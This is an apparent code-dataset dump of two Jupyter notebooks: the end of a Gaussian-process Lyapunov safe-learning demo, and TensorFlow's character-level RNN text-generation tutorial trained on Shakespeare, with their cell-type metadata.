"We define the GP model using one particular sample of the GP, in addition to a stable, closed-loop, linear model.\n$$x_{l+1} = 0.25 x_k + g_\\pi(x),$$\n\nThe prior dynamics are locally asymptotically stable. Moreover, in the one-dimensional case, the dynamics are stable as long as $|x_{k+1}| \\leq |x_{k}|$.",
"_____no_output_____"
]
],
[
[
"# Observation noise\nnoise_var = 0.01 ** 2\n\nwith tf.variable_scope('gp'):\n # Mean dynamics\n mean_function = safe_learning.LinearSystem((0.25, 0.), name='mean_dynamics')\n\n kernel = (gpflow.kernels.Matern32(1, lengthscales=1, variance=0.4**2, active_dims=[0])\n * gpflow.kernels.Linear(1, active_dims=[0]))\n\n gp = safe_learning.GPRCached(np.empty((0, 2), dtype=safe_learning.config.np_dtype),\n np.empty((0, 1), dtype=safe_learning.config.np_dtype),\n kernel,\n mean_function=mean_function)\n gp.likelihood.variance = noise_var\n\n gpfun = safe_learning.GaussianProcess(gp, name='gp_dynamics')",
"_____no_output_____"
],
[
"# Define one sample as the true dynamics\nnp.random.seed(5)\n\n# # Set up a discretization\nsample_disc = np.hstack((np.linspace(-1, 1, 50)[:, None],\n np.zeros((50, 1))))\n\n# # Draw samples\nfs = safe_learning.sample_gp_function(sample_disc, gpfun, number=10, return_function=False)\nplt.plot(sample_disc[:, 0], fs.T)\n\nplt.ylabel('$g(x)$')\nplt.xlabel('x')\nplt.title('Samples drawn from the GP model of the dynamics')\nplt.show()\n\n\ntrue_dynamics = safe_learning.sample_gp_function(\n sample_disc,\n gpfun)[0]\n\n# Plot the basic model\nwith tf.variable_scope('plot_true_dynamics'):\n true_y = true_dynamics(sample_disc, noise=False).eval(feed_dict=true_dynamics.feed_dict)\nplt.plot(sample_disc[:, 0], true_y, color='black', alpha=0.8)\nplt.title('GP model of the dynamics')\nplt.show()",
"_____no_output_____"
],
[
"# lyapunov_function = safe_learning.QuadraticFunction(np.array([[1]]))\nlyapunov_disc = safe_learning.GridWorld([-1., 1.], 3)\nlyapunov_function = safe_learning.Triangulation(lyapunov_disc, [1, 0, 1], name='lyapunov_function')\n\ndynamics = gpfun\npolicy = safe_learning.LinearSystem(np.array([0.]), name='policy')\n\n# Lipschitz constant\n# L_dyn = 0.25 + dynamics.beta(0) * np.sqrt(gp.kern.Mat32.variance) / gp.kern.Mat32.lengthscale * np.max(np.abs(extent))\n# L_V = np.max(lyapunov_function.gradient(grid))\n\nL_dyn = 0.25\nL_V = 1.\n\nlyapunov = safe_learning.Lyapunov(discretization, lyapunov_function, dynamics, L_dyn, L_V, tau, policy)\n\n# Specify the desired accuracy\n# accuracy = np.max(lyapunov.V) / 1e10",
"_____no_output_____"
]
],
[
[
"## Safety based on GP model\n\nLet's start by plotting the prior over the dynamics and the associated prior over $\\dot{V}(x)$.",
"_____no_output_____"
]
],
[
[
"lyapunov.update_safe_set()\nplotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=True)",
"_____no_output_____"
]
],
[
[
"Clearly the model does not allow us to classify any states as safe ($\\dot{V} < -L \\tau$). However, as a starting point, we assume that we know that the system is asymptotially stable within some initial set, $\\mathcal{S}_0$:\n\n$$\\mathcal{S}_0 = \\{ x \\in \\mathbb{R} \\,|\\, |x| < 0.2 \\}$$",
"_____no_output_____"
]
],
[
[
"lyapunov.initial_safe_set = np.abs(lyapunov.discretization.all_points.squeeze()) < 0.2",
"_____no_output_____"
]
],
[
[
"## Online learning\nAs we sample within this initial safe set, we gain more knowledge about the system. In particular, we iteratively select the state withing the safe set, $\\mathcal{S}_n$, where the dynamics are the most uncertain (highest variance).",
"_____no_output_____"
]
],
[
[
"grid = lyapunov.discretization.all_points\nlyapunov.update_safe_set()\n\nwith tf.variable_scope('sample_new_safe_point'):\n safe_set = tf.placeholder(safe_learning.config.dtype, [None, None])\n _, dynamics_std_tf = lyapunov.dynamics(safe_set, lyapunov.policy(safe_set))\n \n \n tf_max_state = tf.placeholder(safe_learning.config.dtype, [1, None])\n tf_max_action = lyapunov.policy(tf_max_state)\n tf_measurement = true_dynamics(tf_max_state, tf_max_action)\n \nfeed_dict = lyapunov.dynamics.feed_dict\n \ndef update_gp():\n \"\"\"Update the GP model based on an actively selected data point.\"\"\"\n # Maximum uncertainty in safe set\n safe_grid = grid[lyapunov.safe_set]\n \n feed_dict[safe_set] = safe_grid\n dynamics_std = dynamics_std_tf.eval(feed_dict=feed_dict)\n \n max_id = np.argmax(dynamics_std)\n max_state = safe_grid[[max_id], :].copy()\n \n feed_dict[tf_max_state] = max_state\n max_action, measurement = session.run([tf_max_action, tf_measurement],\n feed_dict=feed_dict)\n \n arg = np.hstack((max_state, max_action))\n lyapunov.dynamics.add_data_point(arg, measurement)\n lyapunov.update_safe_set()",
"_____no_output_____"
],
[
"# Update the GP model a couple of times\nfor i in range(4):\n update_gp()",
"_____no_output_____"
],
[
"# Plot the new safe set\nplotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=True)",
"_____no_output_____"
]
],
[
[
"We continue to sample like this, until we find the maximum safe set",
"_____no_output_____"
]
],
[
[
"for i in range(20):\n update_gp()\n\nlyapunov.update_safe_set()\nplotting.plot_lyapunov_1d(lyapunov, true_dynamics, legend=False)",
"_____no_output_____"
],
[
"plotting.show_graph(tf.get_default_graph())",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2a36c7e49d3b9a5aaf4f8249e9074a8d69d167 | 44,246 | ipynb | Jupyter Notebook | site/en/tutorials/text/text_generation.ipynb | mustafabozkaya/docs-1 | 1b1a0ad689fe9c204cfd614f91cf5c6199611fd6 | [
"Apache-2.0"
] | 7 | 2021-05-08T18:25:43.000Z | 2021-09-30T13:41:26.000Z | site/en/tutorials/text/text_generation.ipynb | mustafabozkaya/docs-1 | 1b1a0ad689fe9c204cfd614f91cf5c6199611fd6 | [
"Apache-2.0"
] | null | null | null | site/en/tutorials/text/text_generation.ipynb | mustafabozkaya/docs-1 | 1b1a0ad689fe9c204cfd614f91cf5c6199611fd6 | [
"Apache-2.0"
] | 2 | 2021-05-08T18:53:53.000Z | 2021-05-08T19:32:30.000Z | 31.740316 | 494 | 0.529268 | [
[
[
"##### Copyright 2019 The TensorFlow Authors.",
"_____no_output_____"
]
],
[
[
"#@title Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.",
"_____no_output_____"
]
],
[
[
"# Text generation with an RNN",
"_____no_output_____"
],
[
"<table class=\"tfo-notebook-buttons\" align=\"left\">\n <td>\n <a target=\"_blank\" href=\"https://www.tensorflow.org/tutorials/text/text_generation\"><img src=\"https://www.tensorflow.org/images/tf_logo_32px.png\" />View on TensorFlow.org</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb\"><img src=\"https://www.tensorflow.org/images/colab_logo_32px.png\" />Run in Google Colab</a>\n </td>\n <td>\n <a target=\"_blank\" href=\"https://github.com/tensorflow/docs/blob/master/site/en/tutorials/text/text_generation.ipynb\"><img src=\"https://www.tensorflow.org/images/GitHub-Mark-32px.png\" />View source on GitHub</a>\n </td>\n <td>\n <a href=\"https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/text/text_generation.ipynb\"><img src=\"https://www.tensorflow.org/images/download_logo_32px.png\" />Download notebook</a>\n </td>\n</table>",
"_____no_output_____"
],
[
"This tutorial demonstrates how to generate text using a character-based RNN. You will work with a dataset of Shakespeare's writing from Andrej Karpathy's [The Unreasonable Effectiveness of Recurrent Neural Networks](http://karpathy.github.io/2015/05/21/rnn-effectiveness/). Given a sequence of characters from this data (\"Shakespear\"), train a model to predict the next character in the sequence (\"e\"). Longer sequences of text can be generated by calling the model repeatedly.\n\nNote: Enable GPU acceleration to execute this notebook faster. In Colab: *Runtime > Change runtime type > Hardware accelerator > GPU*.\n\nThis tutorial includes runnable code implemented using [tf.keras](https://www.tensorflow.org/programmers_guide/keras) and [eager execution](https://www.tensorflow.org/programmers_guide/eager). The following is sample output when the model in this tutorial trained for 30 epochs, and started with the prompt \"Q\":",
"_____no_output_____"
],
[
"<pre>\nQUEENE:\nI had thought thou hadst a Roman; for the oracle,\nThus by All bids the man against the word,\nWhich are so weak of care, by old care done;\nYour children were in your holy love,\nAnd the precipitation through the bleeding throne.\n\nBISHOP OF ELY:\nMarry, and will, my lord, to weep in such a one were prettiest;\nYet now I was adopted heir\nOf the world's lamentable day,\nTo watch the next way with his father with his face?\n\nESCALUS:\nThe cause why then we are all resolved more sons.\n\nVOLUMNIA:\nO, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, no, it is no sin it should be dead,\nAnd love and pale as any will to that word.\n\nQUEEN ELIZABETH:\nBut how long have I heard the soul for this world,\nAnd show his hands of life be proved to stand.\n\nPETRUCHIO:\nI say he look'd on, if I must be content\nTo stay him from the fatal of our country's bliss.\nHis lordship pluck'd from this sentence then for prey,\nAnd then let us twain, being the moon,\nwere she such a case as fills m\n</pre>",
"_____no_output_____"
],
[
"While some of the sentences are grammatical, most do not make sense. The model has not learned the meaning of words, but consider:\n\n* The model is character-based. When training started, the model did not know how to spell an English word, or that words were even a unit of text.\n\n* The structure of the output resembles a play—blocks of text generally begin with a speaker name, in all capital letters similar to the dataset.\n\n* As demonstrated below, the model is trained on small batches of text (100 characters each), and is still able to generate a longer sequence of text with coherent structure.",
"_____no_output_____"
],
[
"## Setup",
"_____no_output_____"
],
[
"### Import TensorFlow and other libraries",
"_____no_output_____"
]
],
[
[
"import tensorflow as tf\nfrom tensorflow.keras.layers.experimental import preprocessing\n\nimport numpy as np\nimport os\nimport time",
"_____no_output_____"
]
],
[
[
"### Download the Shakespeare dataset\n\nChange the following line to run this code on your own data.",
"_____no_output_____"
]
],
[
[
"path_to_file = tf.keras.utils.get_file('shakespeare.txt', 'https://storage.googleapis.com/download.tensorflow.org/data/shakespeare.txt')",
"_____no_output_____"
]
],
[
[
"### Read the data\n\nFirst, look in the text:",
"_____no_output_____"
]
],
[
[
"# Read, then decode for py2 compat.\ntext = open(path_to_file, 'rb').read().decode(encoding='utf-8')\n# length of text is the number of characters in it\nprint('Length of text: {} characters'.format(len(text)))",
"_____no_output_____"
],
[
"# Take a look at the first 250 characters in text\nprint(text[:250])",
"_____no_output_____"
],
[
"# The unique characters in the file\nvocab = sorted(set(text))\nprint('{} unique characters'.format(len(vocab)))",
"_____no_output_____"
]
],
[
[
"## Process the text",
"_____no_output_____"
],
[
"### Vectorize the text\n\nBefore training, you need to convert the strings to a numerical representation. \n\nThe `preprocessing.StringLookup` layer can convert each character into a numeric ID. It just needs the text to be split into tokens first.",
"_____no_output_____"
]
],
[
[
"example_texts = ['abcdefg', 'xyz']\n\nchars = tf.strings.unicode_split(example_texts, input_encoding='UTF-8')\nchars",
"_____no_output_____"
]
],
[
[
"Now create the `preprocessing.StringLookup` layer:",
"_____no_output_____"
]
],
[
[
"ids_from_chars = preprocessing.StringLookup(\n vocabulary=list(vocab))",
"_____no_output_____"
]
],
[
[
"It converts form tokens to character IDs, padding with `0`:",
"_____no_output_____"
]
],
[
[
"ids = ids_from_chars(chars)\nids",
"_____no_output_____"
]
],
[
[
"Since the goal of this tutorial is to generate text, it will also be important to invert this representation and recover human-readable strings from it. For this you can use `preprocessing.StringLookup(..., invert=True)`. ",
"_____no_output_____"
],
[
"Note: Here instead of passing the original vocabulary generated with `sorted(set(text))` use the `get_vocabulary()` method of the `preprocessing.StringLookup` layer so that the padding and `[UNK]` tokens are set the same way.",
"_____no_output_____"
]
],
[
[
"chars_from_ids = tf.keras.layers.experimental.preprocessing.StringLookup(\n vocabulary=ids_from_chars.get_vocabulary(), invert=True)",
"_____no_output_____"
]
],
[
[
"This layer recovers the characters from the vectors of IDs, and returns them as a `tf.RaggedTensor` of characters:",
"_____no_output_____"
]
],
[
[
"chars = chars_from_ids(ids)\nchars",
"_____no_output_____"
]
],
[
[
"You can `tf.strings.reduce_join` to join the characters back into strings. ",
"_____no_output_____"
]
],
[
[
"tf.strings.reduce_join(chars, axis=-1).numpy()",
"_____no_output_____"
],
[
"def text_from_ids(ids):\n return tf.strings.reduce_join(chars_from_ids(ids), axis=-1)",
"_____no_output_____"
]
],
[
[
"### The prediction task",
"_____no_output_____"
],
[
"Given a character, or a sequence of characters, what is the most probable next character? This is the task you're training the model to perform. The input to the model will be a sequence of characters, and you train the model to predict the output—the following character at each time step.\n\nSince RNNs maintain an internal state that depends on the previously seen elements, given all the characters computed until this moment, what is the next character?\n",
"_____no_output_____"
],
[
"### Create training examples and targets\n\nNext divide the text into example sequences. Each input sequence will contain `seq_length` characters from the text.\n\nFor each input sequence, the corresponding targets contain the same length of text, except shifted one character to the right.\n\nSo break the text into chunks of `seq_length+1`. For example, say `seq_length` is 4 and our text is \"Hello\". The input sequence would be \"Hell\", and the target sequence \"ello\".\n\nTo do this first use the `tf.data.Dataset.from_tensor_slices` function to convert the text vector into a stream of character indices.",
"_____no_output_____"
]
],
[
[
"all_ids = ids_from_chars(tf.strings.unicode_split(text, 'UTF-8'))\nall_ids",
"_____no_output_____"
],
[
"ids_dataset = tf.data.Dataset.from_tensor_slices(all_ids)",
"_____no_output_____"
],
[
"for ids in ids_dataset.take(10):\n print(chars_from_ids(ids).numpy().decode('utf-8'))",
"_____no_output_____"
],
[
"seq_length = 100\nexamples_per_epoch = len(text)//(seq_length+1)",
"_____no_output_____"
]
],
[
[
"The `batch` method lets you easily convert these individual characters to sequences of the desired size.",
"_____no_output_____"
]
],
[
[
"sequences = ids_dataset.batch(seq_length+1, drop_remainder=True)\n\nfor seq in sequences.take(1):\n print(chars_from_ids(seq))",
"_____no_output_____"
]
],
[
[
"It's easier to see what this is doing if you join the tokens back into strings:",
"_____no_output_____"
]
],
[
[
"for seq in sequences.take(5):\n print(text_from_ids(seq).numpy())",
"_____no_output_____"
]
],
[
[
"For training you'll need a dataset of `(input, label)` pairs. Where `input` and \n`label` are sequences. At each time step the input is the current character and the label is the next character. \n\nHere's a function that takes a sequence as input, duplicates, and shifts it to align the input and label for each timestep:",
"_____no_output_____"
]
],
[
[
"def split_input_target(sequence):\n input_text = sequence[:-1]\n target_text = sequence[1:]\n return input_text, target_text",
"_____no_output_____"
],
[
"split_input_target(list(\"Tensorflow\"))",
"_____no_output_____"
],
[
"dataset = sequences.map(split_input_target)",
"_____no_output_____"
],
[
"for input_example, target_example in dataset.take(1):\n print(\"Input :\", text_from_ids(input_example).numpy())\n print(\"Target:\", text_from_ids(target_example).numpy())",
"_____no_output_____"
]
],
[
[
"### Create training batches\n\nYou used `tf.data` to split the text into manageable sequences. But before feeding this data into the model, you need to shuffle the data and pack it into batches.",
"_____no_output_____"
]
],
[
[
"# Batch size\nBATCH_SIZE = 64\n\n# Buffer size to shuffle the dataset\n# (TF data is designed to work with possibly infinite sequences,\n# so it doesn't attempt to shuffle the entire sequence in memory. Instead,\n# it maintains a buffer in which it shuffles elements).\nBUFFER_SIZE = 10000\n\ndataset = (\n dataset\n .shuffle(BUFFER_SIZE)\n .batch(BATCH_SIZE, drop_remainder=True)\n .prefetch(tf.data.experimental.AUTOTUNE))\n\ndataset",
"_____no_output_____"
]
],
[
[
"## Build The Model",
"_____no_output_____"
],
[
"This section defines the model as a `keras.Model` subclass (For details see [Making new Layers and Models via subclassing](https://www.tensorflow.org/guide/keras/custom_layers_and_models)). \n\nThis model has three layers:\n\n* `tf.keras.layers.Embedding`: The input layer. A trainable lookup table that will map each character-ID to a vector with `embedding_dim` dimensions;\n* `tf.keras.layers.GRU`: A type of RNN with size `units=rnn_units` (You can also use an LSTM layer here.)\n* `tf.keras.layers.Dense`: The output layer, with `vocab_size` outputs. It outpts one logit for each character in the vocabulary. These are the log-liklihood of each character according to the model.",
"_____no_output_____"
]
],
[
[
"# Length of the vocabulary in chars\nvocab_size = len(vocab)\n\n# The embedding dimension\nembedding_dim = 256\n\n# Number of RNN units\nrnn_units = 1024",
"_____no_output_____"
],
[
"class MyModel(tf.keras.Model):\n def __init__(self, vocab_size, embedding_dim, rnn_units):\n super().__init__(self)\n self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)\n self.gru = tf.keras.layers.GRU(rnn_units,\n return_sequences=True, \n return_state=True)\n self.dense = tf.keras.layers.Dense(vocab_size)\n\n def call(self, inputs, states=None, return_state=False, training=False):\n x = inputs\n x = self.embedding(x, training=training)\n if states is None:\n states = self.gru.get_initial_state(x)\n x, states = self.gru(x, initial_state=states, training=training)\n x = self.dense(x, training=training)\n\n if return_state:\n return x, states\n else: \n return x",
"_____no_output_____"
],
[
"model = MyModel(\n # Be sure the vocabulary size matches the `StringLookup` layers.\n vocab_size=len(ids_from_chars.get_vocabulary()),\n embedding_dim=embedding_dim,\n rnn_units=rnn_units)",
"_____no_output_____"
]
],
[
[
"For each character the model looks up the embedding, runs the GRU one timestep with the embedding as input, and applies the dense layer to generate logits predicting the log-likelihood of the next character:\n\n",
"_____no_output_____"
],
[
"Note: For training you could use a `keras.Sequential` model here. To generate text later you'll need to manage the RNN's internal state. It's simpler to include the state input and output options upfront, than it is to rearrange the model architecture later. For more details asee the [Keras RNN guide](https://www.tensorflow.org/guide/keras/rnn#rnn_state_reuse).",
"_____no_output_____"
],
[
"## Try the model\n\nNow run the model to see that it behaves as expected.\n\nFirst check the shape of the output:",
"_____no_output_____"
]
],
[
[
"for input_example_batch, target_example_batch in dataset.take(1):\n example_batch_predictions = model(input_example_batch)\n print(example_batch_predictions.shape, \"# (batch_size, sequence_length, vocab_size)\")",
"_____no_output_____"
]
],
[
[
"In the above example the sequence length of the input is `100` but the model can be run on inputs of any length:",
"_____no_output_____"
]
],
[
[
"model.summary()",
"_____no_output_____"
]
],
[
[
"To get actual predictions from the model you need to sample from the output distribution, to get actual character indices. This distribution is defined by the logits over the character vocabulary.\n\nNote: It is important to _sample_ from this distribution as taking the _argmax_ of the distribution can easily get the model stuck in a loop.\n\nTry it for the first example in the batch:",
"_____no_output_____"
]
],
[
[
"sampled_indices = tf.random.categorical(example_batch_predictions[0], num_samples=1)\nsampled_indices = tf.squeeze(sampled_indices,axis=-1).numpy()",
"_____no_output_____"
]
],
[
[
"This gives us, at each timestep, a prediction of the next character index:",
"_____no_output_____"
]
],
[
[
"sampled_indices",
"_____no_output_____"
]
],
[
[
"Decode these to see the text predicted by this untrained model:",
"_____no_output_____"
]
],
[
[
"print(\"Input:\\n\", text_from_ids(input_example_batch[0]).numpy())\nprint()\nprint(\"Next Char Predictions:\\n\", text_from_ids(sampled_indices).numpy())",
"_____no_output_____"
]
],
[
[
"## Train the model",
"_____no_output_____"
],
[
"At this point the problem can be treated as a standard classification problem. Given the previous RNN state, and the input this time step, predict the class of the next character.",
"_____no_output_____"
],
[
"### Attach an optimizer, and a loss function",
"_____no_output_____"
],
[
"The standard `tf.keras.losses.sparse_categorical_crossentropy` loss function works in this case because it is applied across the last dimension of the predictions.\n\nBecause your model returns logits, you need to set the `from_logits` flag.\n",
"_____no_output_____"
]
],
[
[
"loss = tf.losses.SparseCategoricalCrossentropy(from_logits=True)",
"_____no_output_____"
],
[
"example_batch_loss = loss(target_example_batch, example_batch_predictions)\nmean_loss = example_batch_loss.numpy().mean()\nprint(\"Prediction shape: \", example_batch_predictions.shape, \" # (batch_size, sequence_length, vocab_size)\")\nprint(\"Mean loss: \", mean_loss)",
"_____no_output_____"
]
],
[
[
"A newly initialized model shouldn't be too sure of itself, the output logits should all have similar magnitudes. To confirm this you can check that the exponential of the mean loss is approximately equal to the vocabulary size. A much higher loss means the model is sure of its wrong answers, and is badly initialized:",
"_____no_output_____"
]
],
[
[
"tf.exp(mean_loss).numpy()",
"_____no_output_____"
]
],
[
[
"Configure the training procedure using the `tf.keras.Model.compile` method. Use `tf.keras.optimizers.Adam` with default arguments and the loss function.",
"_____no_output_____"
]
],
[
[
"model.compile(optimizer='adam', loss=loss)",
"_____no_output_____"
]
],
[
[
"### Configure checkpoints",
"_____no_output_____"
],
[
"Use a `tf.keras.callbacks.ModelCheckpoint` to ensure that checkpoints are saved during training:",
"_____no_output_____"
]
],
[
[
"# Directory where the checkpoints will be saved\ncheckpoint_dir = './training_checkpoints'\n# Name of the checkpoint files\ncheckpoint_prefix = os.path.join(checkpoint_dir, \"ckpt_{epoch}\")\n\ncheckpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_prefix,\n save_weights_only=True)",
"_____no_output_____"
]
],
[
[
"### Execute the training",
"_____no_output_____"
],
[
"To keep training time reasonable, use 10 epochs to train the model. In Colab, set the runtime to GPU for faster training.",
"_____no_output_____"
]
],
[
[
"EPOCHS = 20",
"_____no_output_____"
],
[
"history = model.fit(dataset, epochs=EPOCHS, callbacks=[checkpoint_callback])",
"_____no_output_____"
]
],
[
[
"## Generate text",
"_____no_output_____"
],
[
"The simplest way to generate text with this model is to run it in a loop, and keep track of the model's internal state as you execute it.\n\n\n\nEach time you call the model you pass in some text and an internal state. The model returns a prediction for the next character and its new state. Pass the prediction and state back in to continue generating text.\n",
"_____no_output_____"
],
[
"The following makes a single step prediction:",
"_____no_output_____"
]
],
[
[
"class OneStep(tf.keras.Model):\n def __init__(self, model, chars_from_ids, ids_from_chars, temperature=1.0):\n super().__init__()\n self.temperature=temperature\n self.model = model\n self.chars_from_ids = chars_from_ids\n self.ids_from_chars = ids_from_chars\n\n # Create a mask to prevent \"\" or \"[UNK]\" from being generated.\n skip_ids = self.ids_from_chars(['','[UNK]'])[:, None]\n sparse_mask = tf.SparseTensor(\n # Put a -inf at each bad index.\n values=[-float('inf')]*len(skip_ids),\n indices = skip_ids,\n # Match the shape to the vocabulary\n dense_shape=[len(ids_from_chars.get_vocabulary())]) \n self.prediction_mask = tf.sparse.to_dense(sparse_mask)\n\n @tf.function\n def generate_one_step(self, inputs, states=None):\n # Convert strings to token IDs.\n input_chars = tf.strings.unicode_split(inputs, 'UTF-8')\n input_ids = self.ids_from_chars(input_chars).to_tensor()\n\n # Run the model.\n # predicted_logits.shape is [batch, char, next_char_logits] \n predicted_logits, states = self.model(inputs=input_ids, states=states, \n return_state=True)\n # Only use the last prediction.\n predicted_logits = predicted_logits[:, -1, :]\n predicted_logits = predicted_logits/self.temperature\n # Apply the prediction mask: prevent \"\" or \"[UNK]\" from being generated.\n predicted_logits = predicted_logits + self.prediction_mask\n\n # Sample the output logits to generate token IDs.\n predicted_ids = tf.random.categorical(predicted_logits, num_samples=1)\n predicted_ids = tf.squeeze(predicted_ids, axis=-1)\n \n # Convert from token ids to characters\n predicted_chars = self.chars_from_ids(predicted_ids)\n\n # Return the characters and model state.\n return predicted_chars, states",
"_____no_output_____"
],
[
"one_step_model = OneStep(model, chars_from_ids, ids_from_chars)",
"_____no_output_____"
]
],
[
[
"Run it in a loop to generate some text. Looking at the generated text, you'll see the model knows when to capitalize, make paragraphs and imitates a Shakespeare-like writing vocabulary. With the small number of training epochs, it has not yet learned to form coherent sentences.",
"_____no_output_____"
]
],
[
[
"start = time.time()\nstates = None\nnext_char = tf.constant(['ROMEO:'])\nresult = [next_char]\n\nfor n in range(1000):\n next_char, states = one_step_model.generate_one_step(next_char, states=states)\n result.append(next_char)\n\nresult = tf.strings.join(result)\nend = time.time()\n\nprint(result[0].numpy().decode('utf-8'), '\\n\\n' + '_'*80)\n\nprint(f\"\\nRun time: {end - start}\")",
"_____no_output_____"
]
],
[
[
"The easiest thing you can do to improve the results is to train it for longer (try `EPOCHS = 30`).\n\nYou can also experiment with a different start string, try adding another RNN layer to improve the model's accuracy, or adjust the temperature parameter to generate more or less random predictions.",
"_____no_output_____"
],
[
"If you want the model to generate text *faster* the easiest thing you can do is batch the text generation. In the example below the model generates 5 outputs in about the same time it took to generate 1 above. ",
"_____no_output_____"
]
],
[
[
"start = time.time()\nstates = None\nnext_char = tf.constant(['ROMEO:', 'ROMEO:', 'ROMEO:', 'ROMEO:', 'ROMEO:'])\nresult = [next_char]\n\nfor n in range(1000):\n next_char, states = one_step_model.generate_one_step(next_char, states=states)\n result.append(next_char)\n\nresult = tf.strings.join(result)\nend = time.time()\n\nprint(result, '\\n\\n' + '_'*80)\n\n\nprint(f\"\\nRun time: {end - start}\")",
"_____no_output_____"
]
],
[
[
"## Export the generator\n\nThis single-step model can easily be [saved and restored](https://www.tensorflow.org/guide/saved_model), allowing you to use it anywhere a `tf.saved_model` is accepted.",
"_____no_output_____"
]
],
[
[
"tf.saved_model.save(one_step_model, 'one_step')\none_step_reloaded = tf.saved_model.load('one_step')",
"_____no_output_____"
],
[
"states = None\nnext_char = tf.constant(['ROMEO:'])\nresult = [next_char]\n\nfor n in range(100):\n next_char, states = one_step_reloaded.generate_one_step(next_char, states=states)\n result.append(next_char)\n\nprint(tf.strings.join(result)[0].numpy().decode(\"utf-8\"))",
"_____no_output_____"
]
],
[
[
"## Advanced: Customized Training\n\nThe above training procedure is simple, but does not give you much control.\nIt uses teacher-forcing which prevents bad predictions from being fed back to the model so the model never learns to recover from mistakes.\n\nSo now that you've seen how to run the model manually next you'll implement the training loop. This gives a starting point if, for example, you want to implement _curriculum learning_ to help stabilize the model's open-loop output.\n\nThe most important part of a custom training loop is the train step function.\n\nUse `tf.GradientTape` to track the gradients. You can learn more about this approach by reading the [eager execution guide](https://www.tensorflow.org/guide/eager).\n\nThe basic procedure is:\n\n1. Execute the model and calculate the loss under a `tf.GradientTape`.\n2. Calculate the updates and apply them to the model using the optimizer.",
"_____no_output_____"
]
],
[
[
"class CustomTraining(MyModel):\n @tf.function\n def train_step(self, inputs):\n inputs, labels = inputs\n with tf.GradientTape() as tape:\n predictions = self(inputs, training=True)\n loss = self.loss(labels, predictions)\n grads = tape.gradient(loss, model.trainable_variables)\n self.optimizer.apply_gradients(zip(grads, model.trainable_variables))\n\n return {'loss': loss}",
"_____no_output_____"
]
],
[
[
"The above implementation of the `train_step` method follows [Keras' `train_step` conventions](https://www.tensorflow.org/guide/keras/customizing_what_happens_in_fit). This is optional, but it allows you to change the behavior of the train step and still use keras' `Model.compile` and `Model.fit` methods.",
"_____no_output_____"
]
],
[
[
"model = CustomTraining(\n vocab_size=len(ids_from_chars.get_vocabulary()),\n embedding_dim=embedding_dim,\n rnn_units=rnn_units)",
"_____no_output_____"
],
[
"model.compile(optimizer = tf.keras.optimizers.Adam(),\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))",
"_____no_output_____"
],
[
"model.fit(dataset, epochs=1)",
"_____no_output_____"
]
],
[
[
"Or if you need more control, you can write your own complete custom training loop:",
"_____no_output_____"
]
],
[
[
"EPOCHS = 10\n\nmean = tf.metrics.Mean()\n\nfor epoch in range(EPOCHS):\n start = time.time()\n\n mean.reset_states()\n for (batch_n, (inp, target)) in enumerate(dataset):\n logs = model.train_step([inp, target])\n mean.update_state(logs['loss'])\n\n if batch_n % 50 == 0:\n template = 'Epoch {} Batch {} Loss {}'\n print(template.format(epoch + 1, batch_n, logs['loss']))\n\n # saving (checkpoint) the model every 5 epochs\n if (epoch + 1) % 5 == 0:\n model.save_weights(checkpoint_prefix.format(epoch=epoch))\n\n print()\n print('Epoch {} Loss: {:.4f}'.format(epoch + 1, mean.result().numpy()))\n print('Time taken for 1 epoch {} sec'.format(time.time() - start))\n print(\"_\"*80)\n\nmodel.save_weights(checkpoint_prefix.format(epoch=epoch))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
